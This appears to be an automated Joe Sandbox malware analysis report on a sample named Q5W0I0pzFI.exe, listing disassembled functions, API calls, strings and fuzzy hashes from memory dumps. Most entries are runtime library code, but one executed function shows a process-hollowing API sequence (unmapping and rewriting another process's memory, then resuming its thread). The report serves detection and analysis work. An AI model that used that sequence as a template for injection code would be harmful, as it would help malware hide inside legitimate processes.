Instruction Fuzzy Hash: F1514CB1980209EEEF11DFA1DC46FEFBBB9AB05704F100069F915B6180D775AA06CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0215F440 Relevance: 10.7, APIs: 7, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 0215F4B7
__CxxThrowException@8.LIBCMT ref: 0215F4E2
__CxxThrowException@8.LIBCMT ref: 0215F504
__CxxThrowException@8.LIBCMT ref: 0215F535
_memset.LIBCMT ref: 0215F554
__CxxThrowException@8.LIBCMT ref: 0215F57A
_sprintf.LIBCMT ref: 0215F594

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 36f314dec2644645b1e10cdd6230264ad9b3ffbc8e78c3b64ddce946acc26382
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: E6515171D80219AEDF21DFA1DC46FEFBBB9EB05704F100129F915B6180D7746A068FA4

Uniqueness

Uniqueness Score: -1.00%

Function 022166D9 Relevance: 9.1, APIs: 6, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd_noexit.LIBCMT ref: 022166DD

Part of subcall function 021759BF: __calloc_crt.LIBCMT ref: 021759E2
Part of subcall function 021759BF: __initptd.LIBCMT ref: 02175A04

__calloc_crt.LIBCMT ref: 02216700
__get_sys_err_msg.LIBCMT ref: 0221671E
__invoke_watson.LIBCMT ref: 0221673B
__get_sys_err_msg.LIBCMT ref: 0221676D
__invoke_watson.LIBCMT ref: 0221678B

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
String ID:
API String ID: 4066021419-0
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: 84f45bda2df5a0846f2b1658f92e8d45b1ba371f51c678f0a4d8ee9f5730d151
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 0711C13265061A7FEB216EA99C00FBF73EEDF507A1F400426FD08A6244E735D9024AE4

Uniqueness

Uniqueness Score: -1.00%

Function 02172AD0 Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 02172B2E
_memcpy_s.LIBCMT ref: 02172BA0
__read_nolock.LIBCMT ref: 02172BFE
__filbuf.LIBCMT ref: 02172C21
_memset.LIBCMT ref: 02172C65

Part of subcall function 02175BA8: __getptd_noexit.LIBCMT ref: 02175BA8

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: 8ddac97daca26aa66f4cafcab5783e8c295e374eedd844e1107dc76a436e801a
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 17519270A803099FDB398F798C846AE77B6AFD4324F248729EC35972D0D7759A52CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02162670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 021626DB
_memset.LIBCMT ref: 02162A30
_memset.LIBCMT ref: 02162AC0

Strings

D, xrefs: 02162AC8

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 36bbd409061953fc2bcf98746c7fa898d62e15004dab3262c7f7dcce215a1231
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 04E15C71D4021AABDF24DFA0CD99FEEB7B8BF04304F14406AE909E6190EB74AA55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0215D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0215D8EA

Strings

(, xrefs: 0215DAE9
, xrefs: 0215DADB
$, xrefs: 0215DAE2

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 35a67f4a5821b5272c85c2cac31acbf57a2f5766ed36e13aa7f3d7ebe9aef237
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 4191BF71D40268DEEF20CFA0DC59BEEBBB5AF06304F1441A9D82577280DBB65A48CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0219FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0219FBF1
__CxxThrowException@8.LIBCMT ref: 0219FC06

Strings

TeM, xrefs: 0219FBE7, 0219FBFB
TeM, xrefs: 0219FBFE

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: TeM$TeM
API String ID: 3728558374-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 27503fcb2ab483838a6890774db0ebee4b4f1d0a62dd9c5e86e6b44630adf4e0
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: D8D06775C4020CBBCB00FFA5D499CDEBBB9AB04344F108466A95897241EB74A34A8FD4

Uniqueness

Uniqueness Score: -1.00%

Function 0215D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0217197D: __wfsopen.LIBCMT ref: 02171988

_fgetws.LIBCMT ref: 0215D15C

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 21c3966d650d7cca2d0c593b7f5618509b611c1b0b584a5d2e7bf21d0f265bc9
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 8A91B2B2D80329EBCF20DFA4DC857AEB7B5AF44304F1405A9EC25A3240E775AA54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0215D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0215D77E
_malloc.LIBCMT ref: 0215D7B2
_malloc.LIBCMT ref: 0215D7C1
_fprintf.LIBCMT ref: 0215D815

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 430a83d632cbe5f8f9d870d26329056252a0624a23c576ffb73a65d2304850bb
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: D9A1B1B0C40258EFEF11EFA4C859BEEBB76AF11304F140028D81576291D7BA5A49CBA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Q5W0I0pzFI.exePID: 2624, Parent PID: 1108COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	7

Executed Functions

Function 02210110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02210156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0221016C
CreateProcessA.KERNELBASE(?,00000000), ref: 02210255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02210270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02210283
GetThreadContext.KERNELBASE(00000000,?), ref: 0221029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022102C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022102E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02210304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0221032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02210399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022103BF
SetThreadContext.KERNELBASE(00000000,?), ref: 022103E1
ResumeThread.KERNELBASE(00000000), ref: 022103ED
ExitProcess.KERNEL32(00000000), ref: 02210412

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 183b284a51a4de45eb43a49aae16098dcfe43d07e968032702add6b6963ce898
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: ACB1C974A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB395D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02210420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02210533

Strings

mfoaskdfnoa, xrefs: 02210520, 02210523
0, xrefs: 02210492
d, xrefs: 02210584
saodkfnosa9uin, xrefs: 022104DA

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 143cf45b66d8c5618922490a09c9883e1e5a05c946fb3b771abf5006b85aa5e4
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 9C511A70D08388EAEB11CBE8C849BDDBFF26F21708F144058D5447F28AC3BA5658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 022105B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 022105EC

Strings

apfHQ, xrefs: 022105E2, 022105E5
o, xrefs: 02210600

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: e28b8b5dc4d550e761b2378ce38154a15c716e7868a6fed9aaa08447bcf7e108
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 55011E70C0429DEADB10DBD8C5587AEBFF5AF51308F148099C8092B241D7B69B98CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02233F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 02233F51

Part of subcall function 02235BA8: __getptd_noexit.LIBCMT ref: 02235BA8

__gmtime64_s.LIBCMT ref: 02233FEA
__gmtime64_s.LIBCMT ref: 02234020
__gmtime64_s.LIBCMT ref: 0223403D
__allrem.LIBCMT ref: 02234093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340AF
__allrem.LIBCMT ref: 022340C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340E4
__allrem.LIBCMT ref: 022340FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02234119
__invoke_watson.LIBCMT ref: 0223418A

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 3d594bb0021cdbbe7c166fbaf83174a8e1b95cea3535d1da0ab277559336700b
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 7F71DCB1A20B17ABD719EEB9CC40B5A73B9BF10364F144179E514E6698EB70DA40CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 022384AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 022384B1
_free.LIBCMT ref: 022384E2
_free.LIBCMT ref: 022384F5
_free.LIBCMT ref: 02238513
_free.LIBCMT ref: 02238525
_free.LIBCMT ref: 02238536
_free.LIBCMT ref: 02238541
_free.LIBCMT ref: 02238565
_free.LIBCMT ref: 02238581
_free.LIBCMT ref: 02238597
_free.LIBCMT ref: 022385BF

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: 558906d036ddeb4ea88fbf3840553051b634a0af95356c6ea759be9e724f0a94
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 0431C8B3A10351DFCF135F94FC8084977A6FB14324705852AFA085B2B4CBB459C99F96

Uniqueness

Uniqueness Score: -1.00%

Function 0225FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::exception::exception.LIBCMT ref: 0225FC1F
__CxxThrowException@8.LIBCMT ref: 0225FC34
std::exception::exception.LIBCMT ref: 0225FC4D
__CxxThrowException@8.LIBCMT ref: 0225FC62
std::regex_error::regex_error.LIBCPMT ref: 0225FC74

Part of subcall function 0225F914: std::exception::exception.LIBCMT ref: 0225F92E

__CxxThrowException@8.LIBCMT ref: 0225FC82
std::exception::exception.LIBCMT ref: 0225FC9B
__CxxThrowException@8.LIBCMT ref: 0225FCB0

Strings

leM, xrefs: 0225FCA8

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
String ID: leM
API String ID: 2862078307-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 4cace3a36ab4f96211a5124a0b7b9309c5d1ea736ff362843ef9ef6c07d23c3d
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 11110A79C1030DBBCB04FFE5D455CDDBB7DAA04740B408566AD1897244EB74E3988F94

Uniqueness

Uniqueness Score: -1.00%

Function 0221F010 Relevance: 15.1, APIs: 10, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0221F01F

Part of subcall function 02231602: __FF_MSGBANNER.LIBCMT ref: 02231619
Part of subcall function 02231602: __NMSG_WRITE.LIBCMT ref: 02231620

_malloc.LIBCMT ref: 0221F02B
_wprintf.LIBCMT ref: 0221F03E
_free.LIBCMT ref: 0221F044
_free.LIBCMT ref: 0221F065
_malloc.LIBCMT ref: 0221F06D
_sprintf.LIBCMT ref: 0221F0C0
_wprintf.LIBCMT ref: 0221F0D2
_wprintf.LIBCMT ref: 0221F0DC
_free.LIBCMT ref: 0221F0E5

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: e66e6d6fce36724f08fa0e87f28dcffd884ae719a26e05bfbc28b623991f5ddb
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: C11136F2A207607AC262A3F40C11FFF7BDD9F45302F0801A9FE9DD1184EA185A149BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02221960 Relevance: 13.6, APIs: 9, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 022219C6
__CxxThrowException@8.LIBCMT ref: 022219F1
__CxxThrowException@8.LIBCMT ref: 02221A1A
__CxxThrowException@8.LIBCMT ref: 02221A4B
_memset.LIBCMT ref: 02221A6A
__CxxThrowException@8.LIBCMT ref: 02221A90
_malloc.LIBCMT ref: 02221AA0
_memset.LIBCMT ref: 02221AAB
_sprintf.LIBCMT ref: 02221ACE

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 0480fd547939deeccef5ee13115130ab17575cab0bb5fd5beb0d1a90ef485787
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: DD516CB1D40219BBEB11DBE1DC86FEFBBB9FB04B04F100025F909B6180EB755A158BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0221F210 Relevance: 10.7, APIs: 7, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 0221F284
__CxxThrowException@8.LIBCMT ref: 0221F2AF
__CxxThrowException@8.LIBCMT ref: 0221F2DE
__CxxThrowException@8.LIBCMT ref: 0221F30F
_memset.LIBCMT ref: 0221F32E
__CxxThrowException@8.LIBCMT ref: 0221F354
_sprintf.LIBCMT ref: 0221F373

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 72751cdf7d93f1fd42e82e8c5ff94951e3cd325bc4bf8f1fc81f6a52b789ccc9
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 8B519FB1E50349AAEF11DFE1DD46FEEBBB9EB04704F100025F915B6180D7B5AA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0221F440 Relevance: 10.7, APIs: 7, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 0221F4B7
__CxxThrowException@8.LIBCMT ref: 0221F4E2
__CxxThrowException@8.LIBCMT ref: 0221F504
__CxxThrowException@8.LIBCMT ref: 0221F535
_memset.LIBCMT ref: 0221F554
__CxxThrowException@8.LIBCMT ref: 0221F57A
_sprintf.LIBCMT ref: 0221F594

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 6b86f23302bf7ba322934a602d736be9eff00a95366d40080c48abee4a0d10e2
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 90516F71E50309BADF21DFE1DD46FEEBBB9EB04704F100129F915B6184EB74AA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 022D66D9 Relevance: 9.1, APIs: 6, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd_noexit.LIBCMT ref: 022D66DD

Part of subcall function 022359BF: __calloc_crt.LIBCMT ref: 022359E2
Part of subcall function 022359BF: __initptd.LIBCMT ref: 02235A04

__calloc_crt.LIBCMT ref: 022D6700
__get_sys_err_msg.LIBCMT ref: 022D671E
__invoke_watson.LIBCMT ref: 022D673B
__get_sys_err_msg.LIBCMT ref: 022D676D
__invoke_watson.LIBCMT ref: 022D678B

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
String ID:
API String ID: 4066021419-0
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: 195beceb2ab2ac870eacc398127ff3e968c70f5bb395892c10662083fa637d92
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 6E11C47162171A6BFB227EE5AC40BFA739DDF04760F000466FD08A6648E765D9008AE4

Uniqueness

Uniqueness Score: -1.00%

Function 02232AD0 Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 02232B2E
_memcpy_s.LIBCMT ref: 02232BA0
__read_nolock.LIBCMT ref: 02232BFE
__filbuf.LIBCMT ref: 02232C21
_memset.LIBCMT ref: 02232C65

Part of subcall function 02235BA8: __getptd_noexit.LIBCMT ref: 02235BA8

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: 264030b789cc007f18cf57b33973c5a6856e714930f47f99dc449cecc1c1f30a
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: E85193F0A20306DBDB268FF988806AE77B6BF40724F148729EC35962D8D7709D51CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02222670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 022226DB
_memset.LIBCMT ref: 02222A30
_memset.LIBCMT ref: 02222AC0

Strings

D, xrefs: 02222AC8

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 9e43dfd2e10ff055f32f772e6374569b431b6508736e147b85de5b9c72ffcc43
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 48E15D71D1022AEACF24DFE0CD49FEEB7B8BF04304F144169E909A6194EB769A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0221D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0221D8EA

Strings

(, xrefs: 0221DAE9
$, xrefs: 0221DAE2
, xrefs: 0221DADB

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 18e12efcc15b8212b7334cdf990d6b62abef512b5a68538151ee3a69cc9298c2
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 4191AC71D10219EAEF21CFE0C849BEEBBF5AF15304F144169D406B7284DBB65A48CFA5

Uniqueness

Uniqueness Score: -1.00%

